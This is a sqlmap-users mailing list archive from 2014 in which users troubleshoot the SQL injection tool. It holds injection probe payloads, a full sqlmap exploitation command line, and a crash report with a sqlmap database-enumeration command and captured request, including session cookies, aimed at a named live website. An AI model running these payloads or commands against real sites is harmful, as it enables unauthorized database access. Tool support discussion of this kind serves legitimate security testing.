My full options list was this to successfully exploit the sqli vectors, for future reference: ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=mysql --force-ssl --tamper=between --drop-set-cookie --text-only On Sun, Mar 30, 2014 at 9:24 AM, Miroslav Stampar < mir...@gm...> wrote: > Always happy when issues are resolved by themselves :) > > Bye > > > On Sun, Mar 30, 2014 at 4:01 PM, Brandon Perry <bpe...@gm...>wrote: > >> Oh, it looks like I am an idiot, this was supposed to be over SSL, but I >> was not passing --force-ssl. >> >> Sorry for the spam. >> >> >> On Sun, Mar 30, 2014 at 8:49 AM, Brandon Perry <bpe...@gm... >> > wrote: >> >>> FWIW --parse-errors also doesn't seem to affect the output during a scan >>> on the URL. >>> >>> >>> On Sun, Mar 30, 2014 at 8:33 AM, Brandon Perry < >>> bpe...@gm...> wrote: >>> >>>> Hi, >>>> >>>> I am playing around with an interesting SQL injection. A GET to a php >>>> script with two params (date1 and date2) will generate a PNG when >>>> successful, but will output a textual error message when, say , an >>>> apostrophe is thrown in one of the dates. >>>> >>>> >>>> For instance, GET fdsa.php?date1=2014-02-28&date2=2014-03-30 will >>>> result in a PNG. >>>> >>>> >>>> GET fdsa.php?date1=2014-02-28&date2=2014-03-30' (note apostrophe in >>>> last param) will yield: >>>> >>>> You have an error in your SQL syntax; check the manual that corresponds >>>> to your MySQL server version for the right syntax to use near 'admin' AND >>>> a.sid=i.sid and i.ref IN (SELECT ref from >>>> Itablet)' at line 4 >>>> >>>> >>>> GET fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1 will result >>>> in a PNG >>>> >>>> >>>> Since the result of a successful query is a PNG, I only expect to be >>>> able to use an error-based, or boolean/time-based attacks. However, sqlmap >>>> doesn't detect that either of the params are injectable (both are). >>>> >>>> [06:04:13] [WARNING] GET parameter 'date1' does not appear dynamic >>>> [06:04:13] [WARNING] heuristic (basic) test shows that GET parameter >>>> 'date1' might not be injectable >>>> >>>> >>>> I have tried using --text-only and am not using -o, but to no avail. >>>> Any thoughts on some tricks I can try to see if sqlmap will be able to >>>> exploit the injection points? >>>> >>>> I can send a traffic file if that helps. Currently on latest. >>>> >>>> bperry@ubuntu:~/tools/sqlmap$ git pull >>>> Already up-to-date. >>>> bperry@ubuntu:~/tools/sqlmap$ >>>> >>>> >>>> -- >>>> http://volatile-minds.blogspot.com -- blog >>>> http://www.volatileminds.net -- website >>>> >>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> >> >> ------------------------------------------------------------------------------ >> >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Miroslav S. <mir...@gm...> - 2014-03-30 14:24:20
|
Always happy when issues are resolved by themselves :) Bye On Sun, Mar 30, 2014 at 4:01 PM, Brandon Perry <bpe...@gm...>wrote: > Oh, it looks like I am an idiot, this was supposed to be over SSL, but I > was not passing --force-ssl. > > Sorry for the spam. > > > On Sun, Mar 30, 2014 at 8:49 AM, Brandon Perry <bpe...@gm...>wrote: > >> FWIW --parse-errors also doesn't seem to affect the output during a scan >> on the URL. >> >> >> On Sun, Mar 30, 2014 at 8:33 AM, Brandon Perry <bpe...@gm... >> > wrote: >> >>> Hi, >>> >>> I am playing around with an interesting SQL injection. A GET to a php >>> script with two params (date1 and date2) will generate a PNG when >>> successful, but will output a textual error message when, say , an >>> apostrophe is thrown in one of the dates. >>> >>> >>> For instance, GET fdsa.php?date1=2014-02-28&date2=2014-03-30 will result >>> in a PNG. >>> >>> >>> GET fdsa.php?date1=2014-02-28&date2=2014-03-30' (note apostrophe in last >>> param) will yield: >>> >>> You have an error in your SQL syntax; check the manual that corresponds >>> to your MySQL server version for the right syntax to use near 'admin' AND >>> a.sid=i.sid and i.ref IN (SELECT ref from >>> Itablet)' at line 4 >>> >>> >>> GET fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1 will result >>> in a PNG >>> >>> >>> Since the result of a successful query is a PNG, I only expect to be >>> able to use an error-based, or boolean/time-based attacks. However, sqlmap >>> doesn't detect that either of the params are injectable (both are). >>> >>> [06:04:13] [WARNING] GET parameter 'date1' does not appear dynamic >>> [06:04:13] [WARNING] heuristic (basic) test shows that GET parameter >>> 'date1' might not be injectable >>> >>> >>> I have tried using --text-only and am not using -o, but to no avail. Any >>> thoughts on some tricks I can try to see if sqlmap will be able to exploit >>> the injection points? >>> >>> I can send a traffic file if that helps. Currently on latest. >>> >>> bperry@ubuntu:~/tools/sqlmap$ git pull >>> Already up-to-date. >>> bperry@ubuntu:~/tools/sqlmap$ >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2014-03-30 14:22:14
|
Hi. Thank you for your report and find it fixed now [1]. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/656 On Sun, Mar 30, 2014 at 9:26 AM, Visual Zhang <nt...@gm...> wrote: > [15:19:32] [CRITICAL] unhandled exception in sqlmap/1.0-dev-e8c1c90, > retry your run with the latest development version from the GitHub > repository. If the exception persists, please send by e-mail to > 'sql...@li...' or open a new issue at > 'https://github.com/sqlmapproject/sqlmap/issues/new' with the > following text and any information required to reproduce the bug. The > developers will try to reproduce the bug, fix it accordingly and get > back to you. > > sqlmap version: 1.0-dev-e8c1c90 > > Python version: 2.7.6 > > Operating system: posix > > Command line: sqlmap.py -r about.txt -p title --dbs --dbms Microsoft SQL > Server > > Technique: TIME > > Back-end DBMS: Microsoft SQL Server (fingerprinted) > > Traceback (most recent call last): > > File "sqlmap.py", line 95, in main > > start() > > File "/Users/ihacku/tools/sqlmap-dev/lib/controller/controller.py", > line 583, in start > > action() > > File "/Users/ihacku/tools/sqlmap-dev/lib/controller/action.py", line > 106, in action > > conf.dumper.dbs(conf.dbmsHandler.getDbs()) > > File "/Users/ihacku/tools/sqlmap-dev/plugins/generic/databases.py", > line 120, in getDbs > > count = inject.getValue(query, union=False, error=False, > expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) > > File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line > 409, in getValue > > value = _goInferenceProxy(query, fromUser, batch, unpack, > charsetType, firstChar, lastChar, dump) > > File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line > 278, in _goInferenceProxy > > outputs = _goInferenceFields(expression, expressionFields, > expressionFieldsList, payload, charsetType=charsetType, > firstChar=firstChar, lastChar=lastChar, dump=dump) > > File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line > 126, in _goInferenceFields > > output = _goInference(payload, expressionReplaced, charsetType, > firstChar, lastChar, dump, field) > > File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line > 98, in _goInference > > count, value = bisection(payload, expression, length, charsetType, > firstChar, lastChar, dump) > > File "/Users/ihacku/tools/sqlmap-dev/lib/techniques/blind/inference.py", > line 528, in bisection > > val = getChar(index, asciiTbl) > > File "/Users/ihacku/tools/sqlmap-dev/lib/techniques/blind/inference.py", > line 258, in getChar > > forgedPayload = safeStringFormat(payload, (expressionUnescaped, > idx, posValue)) > > File "/Users/ihacku/tools/sqlmap-dev/lib/core/common.py", line 1501, > in safeStringFormat > > raise Exception("wrong number of parameters during string formatting") > > Exception: wrong number of parameters during string formatting > > and here's content of about.txt > > POST /about17u/siteinfo/more_wzdt.asp HTTP/1.1 > Content-Length: 75 > Content-Type: application/x-www-form-urlencoded > X-Requested-With: XMLHttpRequest > Referer: http://www.17u.net/ > Cookie: > b2b%5Fcn%5Fmember%5Finfo=iscookiesopen=2014%2D3%2D29+19%3A26%3A52&cityhomepageId=224; > ASPSESSIONIDSQQDBRRT=DNONHMDDINFHGJHPMGGKAPIB; > BIGipServerwww-17u-net-pool=2114064556.9475.0000; line=showType=0; > refid=1365089; BIGipServernetmvc-pool=1426198700.9475.0000; > HistoryAccessSource=101; ASP.NET_SessionId=w11yjefaeqbmq1dkfmbtwtlz; > > historylineId=4642727~%e3%80%90%e6%b8%85%e6%98%8e%e8%8a%82%e3%80%91_%e5%8f%8c%e5%8d%a7%e5%9b%9b%e6%97%a5_%e5%a9%ba%e6%ba%90%e3%80%81%e6%b1%9f%e5%b2%ad%e6%b2%b9%e8%8f%9c%e8%8a%b1%e3%80%81%e6%99%af%e5%be%b7%e9%95%87%e3%80%81%e6%80%a1%e6%83%85%e7%94%b0%e5%9b%ad%e7%ba%af%e7%8e%a9%e6%b8%b8_%e5%8c%97%e4%ba%ac%e5%88%b0%e5%a9%ba%e6%ba%90%e6%97%85%e6%b8%b8%e6%94%bb%e7%95%a5@4642464 > ~%e6%b8%85%e6%98%8e%e6%a1%82%e6%9e%97%e6%97%85%e6%b8%b8%e5%a4%a9%e6%b0%94_%e5%8e%a6%e9%97%a8%e5%88%b0%e6%a1%82%e6%9e%97%e6%97%85%e6%b8%b8%e6%94%bb%e7%95%a5_%e5%8e%a6%e9%97%a8%e5%88%b0%e6%a1%82%e6%9e%97%e6%97%85%e6%b8%b8%e4%bb%b7%e6%a0%bc@4632444 > ~%e6%98%86%e6%98%8e%e5%88%b0%e6%b5%b7%e5%8d%97%e6%b5%b7%e5%8f%a3+%e8%b1%aa%e4%ba%ab%e3%80%81%e4%bc%91%e9%97%b2%e6%b8%b85%e5%a4%a9%e6%b8%b8@4429950 > ~%e5%8d%81%e4%b8%80%e7%9f%b3%e5%ae%b6%e5%ba%84%e6%97%85%e8%a1%8c%e7%a4%be%e7%ba%bf%e8%b7%af%e5%ae%89%e6%8e%92-%e7%9f%b3%e5%ae%b6%e5%ba%84%e5%8e%bb%e4%b8%8a%e6%b5%b7-%e6%9d%ad%e5%b7%9e-%e8%8b%8f%e5%b7%9e%e6%97%85%e6%b8%b8%e5%a4%9a%e5%b0%91%e9%92%b1-%e7%9f%b3%e5%ae%b6%e5%ba%84%e5%8d%81%e4%b8%80%e5%9b%bd%e5%ba%86%e5%8e%bb%e6%97%85%e6%b8%b8@4429283 > ~%e7%9f%b3%e5%ae%b6%e5%ba%84%e6%97%85%e8%a1%8c%e7%a4%be%e5%8d%81%e4%b8%80%e6%97%85%e6%b8%b8%e7%ba%bf%e8%b7%af%e6%8a%a5%e4%bb%b7-%e7%9f%b3%e5%ae%b6%e5%ba%84%e5%8e%bb%e4%b9%9d%e5%af%a8%e6%b2%9f%e6%97%85%e6%b8%b8%e5%a4%9a%e5%b0%91%e9%92%b1-%e6%88%90%e9%83%bd%e3%80%81%e9%bb%84%e9%be%99%e3%80%81%e4%b9%9d%e5%af%a8%e6%b2%9f%e5%8f%8c%e9%a3%9e%e4%ba%94%e6%97%a5%e6%b8%b8; > ASPSESSIONIDSQRDBQRS=KDBKIDEDPEBEHLHAIACMPAKL; > NETSEInfo=RefId=1365089&SEFrom=&SEKeyWords=&RefUrl=; > BIGipServerzuche-rujia365-com-pool=2550245568.20480.0000; > B2bCnMemberLogStat=; sto-id-lvyou.17u.net_gs=JJAAKIMA; > > b2b%5Fcn%5Fmember%5Finfo=cityhomepageId=224&iscookiesopen=2014%2D3%2D29+19%3A41%3A21; > latestEnquiryPage=1; latestQuotePage=1; > ASPSESSIONIDQSQDARRS=LHGDJKEDGHACPAEKOBKAHILP; > ASPSESSIONIDSSTDCTSQ=LJKPJBFDOBHKGEJDFPICJEEP; > ASPSESSIONIDQQQDARRS=OLBLKIFDAJGDMMBHLDICCCNK > Host: www.17u.net > Connection: Keep-alive > Accept-Encoding: gzip,deflate > User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 > (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 > Accept: */* > > search=%cb%d1%20%cb%f7&title=1 > > > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Brandon P. <bpe...@gm...> - 2014-03-30 14:01:17
|
Oh, it looks like I am an idiot, this was supposed to be over SSL, but I was not passing --force-ssl. Sorry for the spam. On Sun, Mar 30, 2014 at 8:49 AM, Brandon Perry <bpe...@gm...>wrote: > FWIW --parse-errors also doesn't seem to affect the output during a scan > on the URL. > > > On Sun, Mar 30, 2014 at 8:33 AM, Brandon Perry <bpe...@gm...>wrote: > >> Hi, >> >> I am playing around with an interesting SQL injection. A GET to a php >> script with two params (date1 and date2) will generate a PNG when >> successful, but will output a textual error message when, say , an >> apostrophe is thrown in one of the dates. >> >> >> For instance, GET fdsa.php?date1=2014-02-28&date2=2014-03-30 will result >> in a PNG. >> >> >> GET fdsa.php?date1=2014-02-28&date2=2014-03-30' (note apostrophe in last >> param) will yield: >> >> You have an error in your SQL syntax; check the manual that corresponds >> to your MySQL server version for the right syntax to use near 'admin' AND >> a.sid=i.sid and i.ref IN (SELECT ref from >> Itablet)' at line 4 >> >> >> GET fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1 will result in >> a PNG >> >> >> Since the result of a successful query is a PNG, I only expect to be able >> to use an error-based, or boolean/time-based attacks. However, sqlmap >> doesn't detect that either of the params are injectable (both are). >> >> [06:04:13] [WARNING] GET parameter 'date1' does not appear dynamic >> [06:04:13] [WARNING] heuristic (basic) test shows that GET parameter >> 'date1' might not be injectable >> >> >> I have tried using --text-only and am not using -o, but to no avail. Any >> thoughts on some tricks I can try to see if sqlmap will be able to exploit >> the injection points? >> >> I can send a traffic file if that helps. Currently on latest. >> >> bperry@ubuntu:~/tools/sqlmap$ git pull >> Already up-to-date. >> bperry@ubuntu:~/tools/sqlmap$ >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
48 messages has been excluded from this view by a project administrator.
